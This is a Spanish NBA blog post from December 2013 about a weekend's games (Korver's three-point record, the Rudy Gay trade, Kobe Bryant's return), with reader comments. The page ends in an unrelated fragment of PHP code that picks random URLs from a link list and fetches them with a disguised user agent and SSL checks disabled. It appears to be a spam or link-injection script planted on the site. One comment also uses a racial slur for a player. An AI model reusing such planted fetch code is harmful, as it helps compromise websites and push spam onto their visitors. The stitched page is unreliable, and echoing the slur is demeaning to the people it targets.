Informe del fin de semana: Korver Legend

09 de December de 2013 por txusma

Récord histórico de 90 partidos consecutivos anotando un triple. La anterior marca estaba en posesión de otra leyenda del baloncesto y mejor persona, como Dana Barros (ironic mode: off)

Se trata de lo poco reseñable que ocurrió el viernes, como ya avisábamos. Alguno de nuestros ilustres habituales se levantó para comprobar que no hubo partido en el Warriors 83 @ Rockets 105 y terminó viendo el duelo “no apto para cardíacos” entre Bucks y Wizards, resolviéndose con un error garrafal que nos “radiaba” casi en directo el propio Simon:

“Wall choca con su propio compañero en una especie de ¿bloqueo? y pisa la línea… balón perdido y victoria para Bucks…”

Para celebrar la victoria de los “ciervos” Denise nos regalaba el inolvidable documento gráfico en el que Larry Sanders nos da una clase magistral de “movimientos de pies”, eso sí, en una pista de baile y con X cubatas de más (y alguno de menos que voló por los aires). Tras Radmanovic y su tabla de snowboard, las habilidades de Monta en motocicleta, Bynum y las conejitas… otro gran ejemplo a seguir. Por otro lado nadie mejor que Denise para describirnos el partido de Orlando:

“Lamentable, rídicula, espantosa segunda parte de los Magic en el mitico Madison.”

Y es que teniendo en cuenta lo que iba a deparar el futuro, no tan lejano, es del todo sonrojante que los Knicks te peguen una paliza. Al menos pudimos ver a alguien que se parecía al mejor y más generoso Carmelo Anthony.

Del resto de la jornada viene llamando la atención el paupérrimo rendimiento de Kyrie Irving y, al hilo, los resultados que está logrando Mike Brown con un equipo del que todos esperábamos bastante más (y esto no es nuevo). Las malas lenguas aseguran que puede haber sido por ser portada de un juego tan lamentable como el NBA Live 14.

Hay que destacar también el gran estado de forma de los Celtics (que ganaron a Denver) y la victoria cómoda de Suns ante Raptors, con doble doble de Markieff Morris. Los Blazers destrozaron a Utah, Oklahoma ganó en New Orleans, Lakers en Sacramento y Philadelphia caía en Charlotte. 

El sábado llegó el espectáculo. Lo hizo desde tres frentes:

“Tremendo el triple de Lillard en la cara de Marion, y la contestación de Monta para ganar el partido.” Denise

Efectivamente los Mavs daban la campanada en Portland en un precioso partido con un trepidante final. Aunque la gran noticia de la jornada era:

“Pasote de nivel de juego que tiene ahora mismo los Pacers. Brutal como funciona ese quinteto titular que una vez más ha reventado el partido en el tercer cuarto. Para verlo porque para que los Spurs parezcan un muñeco roto hay que hacerlo muy muy bien.” Rumbero

Y es cierto que si alguien tenía dudas la noche del sábado en San Antonio debieron despejarse todas. Los Pacers desactivaron un ataque tan complejo como el de los subcampeones con una facilidad insultante y en ataque tampoco tienen problemas con un Paul George del que aún no vislumbramos techo.

El tercer frente que decíamos fue un bonito partido entre King y Jazz que terminó en prórroga y rompió la mala racha de los primeros, con gran actuación de Cousins y también, ojo, de McLemore.

El resto de la jornada más o menos discurrió por los derroteros normales a pesar de que siempre es sorprendente ver ganar a los Nets, aunque sea ante los Bucks no muy sobrados y con actuación brutal de Brook Lopez. Los Cavaliers e Irving, como está comprobado que nos leen diariamente, tambien reaccionaron ante los Clippers que están en estado de letargo (3 derrotas en 4 partidos).

Denver ganó en Philadelphia; los Pistons destrozaron a unos Bulls que jugaron sin Luol Deng; los Warriors rompieron su mala racha particular ante Memphis (11 derrotas consecutivas) y los Heat se aprovecharon de unos Wolves sin Love y con un terrorífico Ricky (para solidarizarse con lo de Irving del día anterior).

Por último, el domingo pasábamos la tarde viendo una extraña película mezcla de gore y porno llamada “Los Celtics se lo pasan en grande con Melo y sus compis en el Madison”. Cosas de las sobremesas del domingo y también posiblemente… de la resaca. De muy mal gusto. No la veáis ni descargada.

Mientras Miami se merendaba a Detroit llegaba la primera sorpresa del día: Rudy Gay era traspasado a los Kings a cambio de Greivis Vasquez, Patrick Patterson, Chuck Hayes y el expiring de John Salmons. Ujiri ha decidido tankear y ya ha conseguido sacarse de encima el contrato de Gay. Buen movimiento para los canadienses.

Un poco más tarde llegaba la segunda sorpresa: paliza de campeonato en lo que podría ser la final de la NBA. Los Thunder salieron de los vestuarios con el cuchillo entre los dientes y  endosaron diferencias de hasta 29 puntos a unos Pacers que llegaban como líderes del campeonato. Aviso para navegantes. Si alguien pensaba que iba a ser fácil que se lo vaya quitando de la cabeza. Durant, Westbrook (y Lebron, Wade, Paul, Duncan, Parker, etc…) no se van a limitar a ser meras comparsas de los actuales niños mimados (y con todo merecimiento) de la liga.

Y finalmente, el momento: Kobe Bryant saltaba a la pista del Staples Center como titular. Primera posesión y Kobe que se aprovecha del miedo escénico que provoca en los rivales para asistir a Robert Sacre. De todas maneras, los Raptors no quisieron participar de la fiesta y se llevaron la victoria aprovechando un mal partido de los locales en general y de un Kobe que todavía ha de ganar ritmo. De momento, ya es una gran noticia tenerle de vuelta.

Comenta

27 comentarios a esta entrada

  1. rumbero dice:
    #1

    Que momentazo la presentación de Kobe con la marcha imperial de Star Wars de fondo. Welcome Darth Mamba

      Citar

  2. TheDeerHunter dice:
    #2

    No quiero quitar méritos a Oklahoma, que ya sabemos la pegada que tiene especialmente en casa… pero dos noches seguidas contra San Antonio y ellos es una encerrona en toda regla.

      Citar

  3. Denise dice:
    #3

    Cousins, Thornton, Rudy Gay, McLemore, Derrick Williams, bffff tienen todos mas peligro que un apagón en el Bar Arny.
    Los Kings ganaran algunos partidos mas pero no les servirá para mucho y encima se comen el contrato de Rudy Gay. Toronto tankeando y consiguiendo espacio salarial, claro ganador del trade a mi juicio.

      Citar

  4. Denise dice:
    #4

    ¿Podrían explicarme lo de Dana Barros y la ironía de mejor persona? Yo en los 90 estaba en el colegio

      Citar

  5. franitis dice:
    #5

    Sobre la victoria de Celtics Vs Knicks y los comentarios de ayer; no se puede sacar una valoración objetiva de Celtics tras ese partido, y todo lo que diga puede estar viciado por cierto velo de oportunismo pero… Creo que Stevens es un buen entrenador y está trabajando con un equipo ausente de egos y sin más presión que intentar unir las piezas que tiene para hacerlo lo mejor posible (o peor, en busca del tanqueo).

    Al final le ha dado las riendas del equipo a Crawford, que partido tras partido nos va haciendo recordar las palabras de Ruxixón a principios de temporada sobre las bondades de éste. Bradley va encontrando la forma en su puesto, Green se va adaptando a ser uno más en un conjunto coral tras evidenciar que no da nivel para franquicia, Sulli mejorando por días y Bass manteniendo una forma muy buena. Y desde el banco aportan mucho Wallace y Humphries en su rol de veteranos sin más, así como Lee que va cogiendo confianza, con los rookies haciendo un papel digno (a la espera que se incorpore Olynyk de su lesión). Me gusta mucho lo que veo y espero la llegada de Rondo como agua de mayo para ver el potencial de este conjunto, que el año que viene con espacio salarial y los 10 millones de la trade exception en el mercado con los FA que hay puede dar un salto importante de calidad (Melo????).

    Ahora bien, 10-12 es un récord negativo y hasta que no se pongan por encima del 50% no van a demostrar nada en una conferencia Este que no da la talla para nada. Que Boston esté donde está puede ser más demérito de otros que mérito propio, así que no me voy a dejar llevar por la euforia del partido de ayer o de las 3 victorias seguidas. Pero sí hay ilusión.

    PD: Me he partido la caja con el comentario sobre el NBA Live 2014, ¿Alguien va a comprar ese juego en el mundo?

      Citar

  6. rumbero dice:
    #6

    TheDeerHunter:
    No quiero quitar méritos a Oklahoma, que ya sabemos la pegada que tiene especialmente en casa… pero dos noches seguidas contra San Antonio y ellos es una encerrona en toda regla.

    Totalmente, buen balance han sacado para lo dura que era esta mini gira. Y para rematarlo, hoy a descansar bien que mañana viene el coco. SAS-OKL-MIA en 4 días. Se lo hacen a Popovich y saca a las cheerleaders a jugar

      Citar

  7. TheDeerHunter dice:
    #7

    Denise:
    ¿Podrían explicarme lo de Dana Barros y la ironía de mejor persona? Yo en los 90 estaba en el colegio

    La ironía venía porque de Dana Barros apenas nos acordamos algunos pocos freaks de esto. Fue un jugador del montón, siendo generoso, aunque tuvo alguna temporada reseñable. Yo particularmente le recuerdo por encalomar con un contratazo a los Celtics justo en los años más negros de la historia de la franquicia. Casualmente tras su temporada esa reseñable que comento. Pasó de firmar casi 21 puntos y 7.5 asistencias en Philadelphia (flor de un año) a 13 y menos de 4 en su primera temporada (de 5 largos años) en Boston a los 28 años. A partir de ahí cuesta abajo. Cazo mix de manual. Durante esa estancia en Boston no pisaron playoffs. Será casualidad pero nunca en la historia de la franquicia ha habido una racha de resultados tan patética.

    En mi opinión ciertos récords no pasan de mera anécdota y son para determinado perfil de jugador… con muy poco o nulo impacto real en el juego. De aquí a 20 años alguno preguntará quién diantres era Kyle Korver…

      Citar

  8. Denise dice:
    #8

    TheDeerHunter: La ironía venía porque de Dana Barros apenas nos acordamos algunos pocos freaks de esto. Fue un jugador del montón, siendo generoso, aunque tuvo alguna temporada reseñable. Yo particularmente le recuerdo por encalomar con un contratazo a los Celtics justo en los años más negros de la historia de la franquicia. Casualmente tras su temporada esa reseñable que comento. Pasó de firmar casi 21 puntos y 7.5 asistencias en Philadelphia (flor de un año) a 13 y menos de 4 en su primera temporada (de 5 largos años) en Boston a los 28 años. A partir de ahí cuesta abajo. Cazo mix de manual. Durante esa estancia en Boston no pisaron playoffs. Será casualidad pero nunca en la historia de la franquicia ha habido una racha de resultados tan patética.En mi opinión ciertos récords no pasan de mera anécdota y son para determinado perfil de jugador… con muy poco o nulo impacto real en el juego. De aquí a 20 años alguno preguntará quién diantres era Kyle Korver…

    ok, de todas formas, Korver si me parece un jugador notable como para acordarse. Y en sus ultimos años de carrera se irá a algun contender tipo MIke Miller.
    En ese aspecto entonces, Dana Barros se podría comparar a Navarro y Rudy cuando batieron los records de triples de rookies, en EEUU ya nadie se acordará de ellos.

      Citar

  9. TheDeerHunter dice:
    #9

    Sí, lo de esos récords viene a ser eso. De todas formas ellos no se acordarán, pero Navarro tiene más baloncesto en un pelo de su barba que todos los demás en la integridad de su alma. Y Rudy, bueno… ciertamente no le sentó demasiado bien su paso por la NBA.

    Sobre la comparativa Mike Miller vs Korver… diría que no calificaría de notables a ninguno de los dos, pero Miller hizo buenas campañas tanto en Orlando como en Memphis, y qué decir de sus aportaciones en las últimas finales.
    Este puede ser el mejor año de Korver y yo diría que no pasa de un buen año. Su carrera hasta el momento me parece más decepcionante que otra cosa. Por cierto, ninguno de los dos le ha llegado a los zapatos de aquel gran año de Dana Barros…

      Citar

  10. TheDeerHunter dice:
    #10

    Por cierto, a colación de Rudy y recordando a McMallon, está de asistente de Voguel. Su cara de panquemao me la señaló un amigo el otro día y casi me caigo del susto. Yo no lo sabía.

      Citar

  11. Denise dice:
    #11

    TheDeerHunter: Por cierto, a colación de Rudy y recordando a McMallon, está de asistente de Voguel. Su cara de panquemao me la señaló un amigo el otro día y casi me caigo del susto. Yo no lo sabía.

    Ahora entiendo por qué Indiana va también y juega tan buena defensa. McMillan es un incomprendido en este blog y se merece entrenar a un equipo ya.

      Citar

  12. Esteban dice:
    #12

    no entiendo a los Raptors, estando tan baratos los PO en el este, con un poco de perseverancia hubiesen entrado, para ser barridos es cierto, pero no siempre se puede llegar a PO

    los Kings hacen un movimiento bueno, Thomas estaba sobrepasando a Vazquez y cambiaron a este ultimo antes de que su valor cayera aun mas,

    esta claro que los Kings con nuevos dueños, quieren algunos resultados, si los Kings quieren a un tio d 20 puntos por partido o meten en el trade a Cousins o traen a Rudy Gay, uno de los pocos anotadores natos de la liga con tan mal cartel

      Citar

  13. Heineken dice:
    #13

    Toronto esta practicando el MoneyBall y me parece mejor tratar de reconstruir bien quitándote a los contratazos que aprovechar el bajo nivel del Este para meterte en playoffs y llevarte un rosco en primera ronda.

    Imagino que los siguientes serán Lowry que acaba contrato y Fields, que el próximo año cobrará 8 Kilos.

      Citar

  14. Denise dice:
    #14

    Esteban: esta claro que los Kings con nuevos dueños, quieren algunos resultados, si los Kings quieren a un tio d 20 puntos por partido o meten en el trade a Cousins o traen a Rudy Gay, uno de los pocos anotadores natos de la liga con tan mal cartel

    Pero hay muchas escopetas de feria en ese vestuario, es decir, tios irregulares, inconsistentes en el tiro, unidimensionales y que un dia te meten 30 ptos y al dia siguiente 4.
    Ya digo que ganaran algunos partidos mas, venderan mas camisetas e irá ams gente a verlos, pero con los actuales jugadores no pasas una primera ronda de playoffs en los proximos 3 años.

      Citar

  15. Esteban dice:
    #15

    a mi no me desagradan los Kings, si vemos un año atras, han mejorado su equipo y si transforman a Derrick Williams nuevamente en 4, tendran un 5 inicial al menos aceptable

      Citar

  16. Ruxixón dice:
    #16

    Daimiel comentaba esta noche en la retransmisión del Pacers @ Thunder (+1 al sindicato defensor de Indiana en cuestión de calendario) que la idea de Sacramento era hacer jugar a Rudy Gay de 4 y D.Williams de 3,lo cual (des)maquilla aún más el traspaso visto desde Sacramento,al que se le veia a la legua que iba a hacer más movimientos,pensaba que primero se iban a tirar a por Waiters,pero bueno,fichaje de relumbrón si que es.Mucho nombre,interesante equipo para mirar estadísticas individuales,pero se vislumbra 0 química de equipo.Dicho esto la única manera de dar un paso adelante en la franquicia era haciendo un movimiento arriesgado.

    Para Toronto,si a principios de temporada estaba en contra de la opinión de que iban a tanquear,ahora estoy con la cabeza puesta en Toronto buscando a Wiggins,que dicho sea de paso está bajando en los mocks.Para ellos que un jugador con ese potencial quiera jugar en la franquicia tiene que ser un chollo.Además con lo que llega y con lo que tienen,en 2015 pueden dar un paso adelante brutal si pescan con inteligencia en la FA.

    PD.gran Dana Barros!muy buen anotador con el hándicap de sus 5’11,con mucha competencia en Sonics,esa muy buena temporada en 76ers y con un rol definido en Celtics,aportando menos ofensivamente,y con ese contratazo firmado gracias a ese año.

      Citar

  17. Denise dice:
    #17

    Tras llegar a casa estoy viendo los boxscores. Dos cosas me llaman la atención del Lakers vs Raptors

    – Todos los titulares de Lakers anotaron menos de 10 puntos y todos los suplentes mas de 10, ¿esto habrá pasado alguna vez en toda la historia?

    – Si alguien ha visto el partido, ¿podría decirme si el 14 de 17 en tiros y por consecuencia. el 32-10 de Amir Johnson se debe a la poca defensa de Pau? Que por cierto, penosa temporada la del catalán, a raiz de este año creo que ya si podemos decir que ahora mismo el mejor de los Gasol es Marc.

      Citar

  18. Denise dice:
    #18

    Denise:

    – Si alguien ha visto el partido, ¿podría decirme si el 14 de 17 en tiros y por consecuencia. el 32-10 de Amir Johnson se debe a la poca defensa de Pau? Que por cierto, penosa temporada la del catalán, a raiz de este año creo que ya si podemos decir que ahora mismo el mejor de los Gasol es Marc.

    Bueno, he encontrado la prueba, si que se come unas cuantas..

      Citar

  19. HisRoyalAirness dice:
    #19

    Denise:
    Tras llegar a casa estoy viendo los boxscores. Dos cosas me llaman la atención del Lakers vs Raptors

    – Todos los titulares de Lakers anotaron menos de 10 puntos y todos los suplentes mas de 10, ¿esto habrá pasado alguna vez en toda la historia?

    – Si alguien ha visto el partido, ¿podría decirme si el 14 de 17 en tiros y por consecuencia. el 32-10 de Amir Johnson se debe a la poca defensa de Pau? Que por cierto, penosa temporada la del catalán, a raiz de este año creo que ya si podemos decir que ahora mismo el mejor de los Gasol es Marc.

    Hombre, ultimamente creo que eso es evidente. Pero dudo que Marc llegue a ser lo que fue su hermano en su momento

      Citar

  20. Denise dice:
    #20

    HisRoyalAirness: Hombre, ultimamente creo que eso es evidente. Pero dudo que Marc llegue a ser lo que fue su hermano en su momento

    No, eso no, otro español tan bueno como lo ha sido Pau puedes tardar perfectamente 25 años en verlo.

      Citar

  21. Vader dice:
    #21

    Denise: No, eso no, otro español tan bueno como lo ha sido Pau puedes tardar perfectamente 25 años en verlo.

    También hay que tener en cuenta que Pau ha tenido un par de problemas físicos en este inicio de temporada y eso junto a su edad pues así esta… Pero repito lo que dije hace unos días, como este verano se le ocurra irse a Miami o Oklahoma puede poner la liga patas arriba.

    Reflexionando sobre los últimos tiempos en mis Knicks he llegado a dos conclusiones;

    – No creo que echen a Woodson, No por lo menos hasta que se vea como funciona el equipo con Chandler. Si cuando vuelva este siguen tan mal o sin pillar una buena racha (que tal y como esta el Este no tendría que ser difícil) ya no descarto nada.

    – Lo mejor que pueden hacer los Knicks ahora mismo a nivel de despachos es… no hacer nada. No hacer nada y esperar al verano del 2015 donde solo tendremos los salarios de Felton y JR Smith (no muy altos), y los de Melo y Shumpert si siguen en el equipo. Allí el objetivo seria pescar uno o dos buenos agentes libres que te den el salto de calidad en el equipo y luego renovar a Chandler u otros jugadores actuales que te puedan interesar. Para atraer a agentes libres tienes la ventaja que son los Knicks y que es New York, un gran mercado. Pero también es importante estos dos años seguir metiéndose en playoff y no dar una imagen de equipo perdedor, porque los jugadores les cuesta mucho firmar por equipos así, por muy Knicks que se llamen.

    Si en este camino se puede hacer algún traspaso interesante adelante, pero siempre tiene que ser con la condición de no comprometer más salario en el 2015-2016. Hasta si al final se traspasa a Shumpert (la única pieza con valor) o Chandler tendría que ir acompañado de Felton o JR.Smith para liberar más salario.

    Lo que me temo que pasará, sobretodo si Melo renueva, es que el próximo verano usarán alguno de los expirings (sobretodo los de Stat y Bargiani, Chandler no creo que lo muevan) para hacer algún traspaso y traer alguna semi-estrellita para acompañar a Melo que nos comprometa otra vez salario pero no nos saque de pobres… Por eso depende de como se mire casi es mejor que Melo se vaya a otro equipo y los Knicks se centren en el verano de 2015 y 2016.

    Saludos

    No tenemos rondas hasta 2018 así que quitarse jugadores para tankear no sirve de nada. Son los Knicks y es mejor meterse estos dos años en playoff esp

      Citar

  22. Denise dice:
    #22

    Estoy viendo un trozo diferido de un partido de Kansas para ver a Wiggins. Y es muy bueno, pero en el equipo tienen a un negraco llamado Embiid que mola un montón. Tiene manos de mantequilla, pero intimida y corre la pista que da gusto. A lo mejor luego se convierte en un Thabeet pero este tío debe ser un Top 10 y eso que está verde.

      Citar

  23. Esteban dice:
    #23

    cierto, un tema que no ha tenido mucha trascendencia, al menos en este blog, es la caida de WIGGINS en los moch, HASTA UN TERCER PUESTO! supuestamente tiene potencial de Lebron James, entonces los dos que estan delante de el tienen potencial de jordan y magic

      Citar

  24. Esteban dice:
    #24

    Vader: el objetivo seria pescar uno o dos buenos agentes libres que te den el salto de calidad en el equipo y luego renovar a Chandler u otros jugadores actuales que te puedan interesar. Para atraer a agentes libres tienes la ventaja que son los Knicks y que es New York, un gran mercado. Pero también es importante estos dos años seguir metiéndose en playoff y no dar una imagen de equipo perdedor, porque los jugadores les cuesta mucho firmar por equipos así, por muy Knicks que se llamen.

    con melo, shumpert, felton y smith, fichar dos agentes libres que den el salto de calidad?

    hoy por hoy son poquitos los jugadores que le dan un salto de calidad a un equipo, y no creo que con esos contratos pueden fichar a dos…

      Citar

  25. Denise dice:
    #25

    Según algunos medios, Stephen Jackson a Clippers.

    Hombre, si Popovych desechó a esta criatura será por algo, pero para cubrir temporalmente las bajas de Redick y Barnes, no viene mal un tipo de este calibre con sangre en las venas, y curtido en mil batallas.

      Citar

  26. Vader dice:
    #26

    Esteban: con melo, shumpert, felton y smith, fichar dos agentes libres que den el salto de calidad?

    hoy por hoy son poquitos los jugadores que le dan un salto de calidad a un equipo, y no creo que con esos contratos pueden fichar a dos…

    En el caso de que Melo siguiera tendrías su contrato, los de Felton y Smith (si no los has traspasado) y Shumpert que seguro que llegado el caso estaría traspasado… Ahí firmar un gran agente libre que haga buena pareja con Melo.

    Esta muy complicada la cosa ahora mismo.

      Citar

  27. HisRoyalAirness dice:
    #27

    Estoy con Vader en lo de que si Pau se va a un contender este verano la lía. Debe ser de los 3-4 jugadores que saben jugar deverdad en el poste y su capacidad de pase es de libro.

    Y lo siento por los knickerbockers que haya por aqui pero creo que lo único sensato que puede hacer NY ahora mismo es plantearse muy seriamente traspasar a Melo. Si es listo no se va a quedar y dejarle irse a cambio de nada es una subnormalidad. Clippers? Rockets? Hagan sus apuestas

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>